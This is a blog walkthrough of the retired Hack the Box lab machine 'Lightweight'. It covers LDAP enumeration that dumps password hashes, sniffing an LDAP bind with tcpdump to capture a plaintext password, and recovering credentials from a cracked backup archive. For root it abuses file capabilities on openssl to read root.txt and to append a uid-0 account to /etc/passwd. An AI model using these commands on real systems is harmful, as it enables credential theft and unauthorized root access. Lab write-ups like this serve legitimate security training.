HTB – Lightweight

Today we are going to solve another CTF challenge “lightweight”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Medium

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sV -sT -sC lightweight.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:55 EDT
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 13.55% done; ETC: 02:57 (0:01:23 remaining)
Nmap scan report for lightweight.htb (10.10.10.119)
Host is up (0.54s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
| 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
| 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after: 2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.51 seconds

Therefore, with the help of nmap NSE script we go for LDAP enumeration:

root@kali:~/htb/lightweight# nmap -Pn -p 389 --script ldap-search 10.10.10.119
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 02:57 EDT
Nmap scan report for lightweight.htb (10.10.10.119)
Host is up (0.026s latency).

PORT STATE SERVICE
389/tcp open ldap
| ldap-search: 
| Context: dc=lightweight,dc=htb
| dn: dc=lightweight,dc=htb
| objectClass: top
| objectClass: dcObject
| objectClass: organization
| o: lightweight htb
| dc: lightweight
| dn: cn=Manager,dc=lightweight,dc=htb
| objectClass: organizationalRole
| cn: Manager
| description: Directory Manager
| dn: ou=People,dc=lightweight,dc=htb
| objectClass: organizationalUnit
| ou: People
| dn: ou=Group,dc=lightweight,dc=htb
| objectClass: organizationalUnit
| ou: Group
| dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
| uid: ldapuser1
| cn: ldapuser1
| sn: ldapuser1
| mail: ldapuser1@lightweight.htb
| objectClass: person
| objectClass: organizationalPerson
| objectClass: inetOrgPerson
| objectClass: posixAccount
| objectClass: top
| objectClass: shadowAccount
| userPassword: {crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
| shadowLastChange: 17691
| shadowMin: 0
| shadowMax: 99999
| shadowWarning: 7
| loginShell: /bin/bash
| uidNumber: 1000
| gidNumber: 1000
| homeDirectory: /home/ldapuser1
| dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
| uid: ldapuser2
| cn: ldapuser2
| sn: ldapuser2
| mail: ldapuser2@lightweight.htb
| objectClass: person
| objectClass: organizationalPerson
| objectClass: inetOrgPerson
| objectClass: posixAccount
| objectClass: top
| objectClass: shadowAccount
| userPassword: {crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
| shadowLastChange: 17691
| shadowMin: 0
| shadowMax: 99999
| shadowWarning: 7
| loginShell: /bin/bash
| uidNumber: 1001
| gidNumber: 1001
| homeDirectory: /home/ldapuser2
| dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: ldapuser1
| userPassword: {crypt}x
| gidNumber: 1000
| dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
| objectClass: posixGroup
| objectClass: top
| cn: ldapuser2
| userPassword: {crypt}x
|_ gidNumber: 1001

Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds

 

Since we know that http service was running on port 80 therefore, we navigate to a web browser and browse target IP and welcome by following page where we saw “This site is protected by against brute forcing ” that mean fail2ban could be running inside VM moreover we found three hyperlinks.

When I opened the user.php hyperlink I read the highlighted text and according to this text, a user in the machine has been automatically added for us.

Exploiting

Therefore, I try to connect with SSH by using 10.10.14.10:10.10.14.10 as login credential. At this point, I was not sure what should be done to extract hidden flag, therefore, I thought to identify the binary capability files with the help of getcap and saw the fruitful result.

root@kali:~/htb# ssh 10.10.14.7@lightweight.htb
10.10.14.7@lightweight.htb's password:10.10.14.7
[10.10.14.7@lightweight ~]$ id
uid=1003(10.10.14.7) gid=1003(10.10.14.7) groups=1003(10.10.14.7) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[10.10.14.7@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
tcpdump -i any -X port ldap

As result, we observe the following traffic, as predicted, where I found the ldapuser2 password in plaintext.

[10.10.14.7@lightweight ~]$ tcpdump -i any -X port ldap
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
08:04:48.987956 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [S], seq 4215069383, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 0,nop,wscale 6], length 0
0x0000: 4500 003c 6a21 4000 4006 a799 0a0a 0a77 E..<j!@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac7 0000 0000 ...w.....<......
0x0020: a002 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0000 0000 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.987983 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [S.], seq 3703358360, ack 4215069384, win 43690, options [mss 65495,sackOK,TS val 372966 ecr 372966,nop,wscale 6], length 0
0x0000: 4500 003c 0000 4000 4006 11bb 0a0a 0a77 E..<..@.@......w
0x0010: 0a0a 0a77 0185 e8fe dcbc c398 fb3c dac8 ...w.........<..
0x0020: a012 aaaa 2930 0000 0204 ffd7 0402 080a ....)0..........
0x0030: 0005 b0e6 0005 b0e6 0103 0306 0000 0000 ................
0x0040: 0000 0000 0000 0000 0000 0000 ............
08:04:48.988003 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 6a22 4000 4006 a7a0 0a0a 0a77 E..4j"@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.988062 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 1:92, ack 1, win 683, options [nop,nop,TS val 372966 ecr 372966], length 91
0x0000: 4500 008f 6a23 4000 4006 a744 0a0a 0a77 E...j#@.@..D...w
0x0010: 0a0a 0a77 e8fe 0185 fb3c dac8 dcbc c399 ...w.....<......
0x0020: 8018 02ab 2983 0000 0101 080a 0005 b0e6 ....)...........
0x0030: 0005 b0e6 3059 0201 0160 5402 0103 042d ....0Y...`T....-
0x0040: 7569 643d 6c64 6170 7573 6572 322c 6f75 uid=ldapuser2,ou
0x0050: 3d50 656f 706c 652c 6463 3d6c 6967 6874 =People,dc=light
0x0060: 7765 6967 6874 2c64 633d 6874 6280 2038 weight,dc=htb..8
0x0070: 6263 3832 3531 3333 3261 6265 3164 3766 bc8251332abe1d7f
0x0080: 3130 3564 3365 3533 6164 3339 6163 3200 105d3e53ad39ac2.
0x0090: 0000 0000 0000 0000 0000 0000 0000 00 ...............
08:04:48.988069 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [.], ack 92, win 683, options [nop,nop,TS val 372966 ecr 372966], length 0
0x0000: 4500 0034 737f 4000 4006 9e43 0a0a 0a77 E..4s.@.@..C...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0e6 ....)(..........
0x0030: 0005 b0e6 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:48.997887 IP lightweight.htb.ldap > lightweight.htb.59646: Flags [P.], seq 1:15, ack 92, win 683, options [nop,nop,TS val 372976 ecr 372966], length 14
0x0000: 4500 0042 7380 4000 4006 9e34 0a0a 0a77 E..Bs.@.@..4...w
0x0010: 0a0a 0a77 0185 e8fe dcbc c399 fb3c db23 ...w.........<.#
0x0020: 8018 02ab 2936 0000 0101 080a 0005 b0f0 ....)6..........
0x0030: 0005 b0e6 300c 0201 0161 070a 0100 0400 ....0....a......
0x0040: 0400 0000 0000 0000 0000 0000 0000 0000 ................
0x0050: 0000 ..
08:04:48.997899 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [.], ack 15, win 683, options [nop,nop,TS val 372976 ecr 372976], length 0
0x0000: 4500 0034 6a24 4000 4006 a79e 0a0a 0a77 E..4j$@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8010 02ab 2928 0000 0101 080a 0005 b0f0 ....)(..........
0x0030: 0005 b0f0 0000 0000 0000 0000 0000 0000 ................
0x0040: 0000 0000 ....
08:04:49.001674 IP lightweight.htb.59646 > lightweight.htb.ldap: Flags [P.], seq 92:99, ack 15, win 683, options [nop,nop,TS val 372980 ecr 372976], length 7
0x0000: 4500 003b 6a25 4000 4006 a796 0a0a 0a77 E..;j%@.@......w
0x0010: 0a0a 0a77 e8fe 0185 fb3c db23 dcbc c3a7 ...w.....<.#....
0x0020: 8018 02ab 292f 0000 0101 080a 0005 b0f4 ....)/..........
0x0030: 0005 b0f0 3005 0201 0242 0006 0000 0000 ....0....B......
0x0040: 0000 0000 0000 0000 0000 00 ...........
^C
8 packets captured
44 packets received by filter
28 packets dropped by kernel

Then we switch the user with the following credential and obtain our first flag user.txt

Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
10.10.14.7@lightweight ~]$ su ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.7]$ pwd
/home/10.10.14.7
[ldapuser2@lightweight 10.10.14.7]$ cd ..
[ldapuser2@lightweight home]$ ls
10.10.14.2 10.10.14.7 ldapuser1 ldapuser2
[ldapuser2@lightweight home]$ cd ldapuser2
[ldapuser2@lightweight ~]$ ls
backup.7z OpenLDAP-Admin-Guide.pdf OpenLdap.pdf user.txt
[ldapuser2@lightweight ~]$ cat user.txt
8a866d3bb7e13a57aaeb110297f48026

Privilege Escalation

Inside the directory /ldapuser2, I found an archive as backup.7z and for its inspection, we need to transfer this file mine in our local machine.

[ldapuser2@lightweight ~]$ cat backup.7z | base64
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpB
lJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVu
--snip--
3sgjI
hYusiF1vL3ojt9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7X
WwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA

So, I copied it in our machine and try to extract the file, but it was password protected.

I used below to crack the file

And use the “delete” password to extract the directory. I found some php files here and we looked for a status.php file among those files.

root@kali:~/htb/lightweight# 7z e backup.7z

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Pentium(R) CPU 4415U @ 2.30GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1


Enter password (will not be echoed):
Everything is Ok

Files: 5
Size: 10270
Compressed: 3411
root@kali:~/htb/lightweight# ls
backup.7z backup.7z.b64 index.php info.php reset.php status.php user.php

The status.php file reveals the password of ldapuser1 as shown below.

root@kali:~/htb/lightweight# cat status.php | grep user
$username = 'ldapuser1';
//$ldapconfig['usersdn'] = 'cn=users';
$dn="uid=ldapuser1,ou=People,dc=lightweight,dc=htb";
<p><br><br><a href="index.php">home</a>&nbsp;&nbsp;<a href="info.php">info</a>&nbsp;&nbsp;<a href="status.php">status</a>&nbsp;&nbsp;<a href="user.php">user</a></p>
root@kali:~/htb/lightweight# cat status.php | grep password
$password = 'f3ca9d298a553da117442deeb6fa932d';
if ($bind=ldap_bind($ds, $dn, $password)) {

Thus, we switched to ldapuser1 and navigate inside the directory of ldapuser1

[ldapuser2@lightweight ~]$ su ldapuser1
Password: f3ca9d298a553da117442deeb6fa932d
[ldapuser1@lightweight ldapuser2]$ pwd
/home/ldapuser2
[ldapuser1@lightweight /]$ cd /home/ldapuser1
[ldapuser1@lightweight ~]$ ls -la
total 1496
drwx------. 4 ldapuser1 ldapuser1 181 Jun 15 2018 .
drwxr-xr-x. 6 root root 76 Sep 6 07:57 ..
-rw-------. 1 ldapuser1 ldapuser1 0 Jun 21 2018 .bash_history
-rw-r--r--. 1 ldapuser1 ldapuser1 18 Apr 11 2018 .bash_logout
-rw-r--r--. 1 ldapuser1 ldapuser1 193 Apr 11 2018 .bash_profile
-rw-r--r--. 1 ldapuser1 ldapuser1 246 Jun 15 2018 .bashrc
drwxrwxr-x. 3 ldapuser1 ldapuser1 18 Jun 11 2018 .cache
-rw-rw-r--. 1 ldapuser1 ldapuser1 9714 Jun 15 2018 capture.pcap
drwxrwxr-x. 3 ldapuser1 ldapuser1 18 Jun 11 2018 .config
-rw-rw-r--. 1 ldapuser1 ldapuser1 646 Jun 15 2018 ldapTLS.php
-rwxr-xr-x. 1 ldapuser1 ldapuser1 555296 Jun 13 2018 openssl
-rwxr-xr-x. 1 ldapuser1 ldapuser1 942304 Jun 13 2018 tcpdump
[ldapuser1@lightweight ~]$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/tcpdump = cap_net_admin,cap_net_raw+ep
/home/ldapuser1/openssl =ep
[ldapuser1@lightweight ~]$ ./openssl base64 -a -in /root/root.txt | base64 -d
f1d4e309c5a6b3fffff74a8f4b2135fa

This time once again I checked for file capacity where I saw OpenSSL has all privileges to read a file that owned root user and therefore we decided to grab root.txt directly through OpenSSL.

We can also get a root shell by overwriting /etc/passwd . I got a copy of the original passwd file first : ./openssl enc -base64 -in /etc/passwd -out ./passwd.b64

[ldapuser1@lightweight ~]$ base64 -d passwd.b64 > passwd
[ldapuser1@lightweight ~]$ echo "toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash" >> passwd
[ldapuser1@lightweight ~]$ cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
--snip--
tcpdump:x:72:72::/:/sbin/nologin
ldap:x:55:55:OpenLDAP server:/var/lib/ldap:/sbin/nologin
saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
10.10.14.7:x:1003:1003::/home/10.10.14.7:/bin/bash
toor1:aaKNIEDOaueR6:0:0:toor:/root:/bin/bash
[ldapuser1@lightweight ~]$ ./openssl enc -in passwd -out /etc/passwd
[ldapuser1@lightweight ~]$ su toor1
Password: foo
[root@lightweight ldapuser1]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@lightweight ldapuser1]# hostnamectl 
Static hostname: lightweight.htb
Icon name: computer-vm
Chassis: vm
Machine ID: 5c4e4aeb65784243992e15ac56ed6b3d
Boot ID: d6332c6cc8834f9980faf65efa1a6513
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-862.3.3.el7.x86_64
Architecture: x86-64
[root@lightweight ldapuser1]#

credits to : https://www.hackingarticles.in/lightweight-hack-the-box-walkthrough/

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *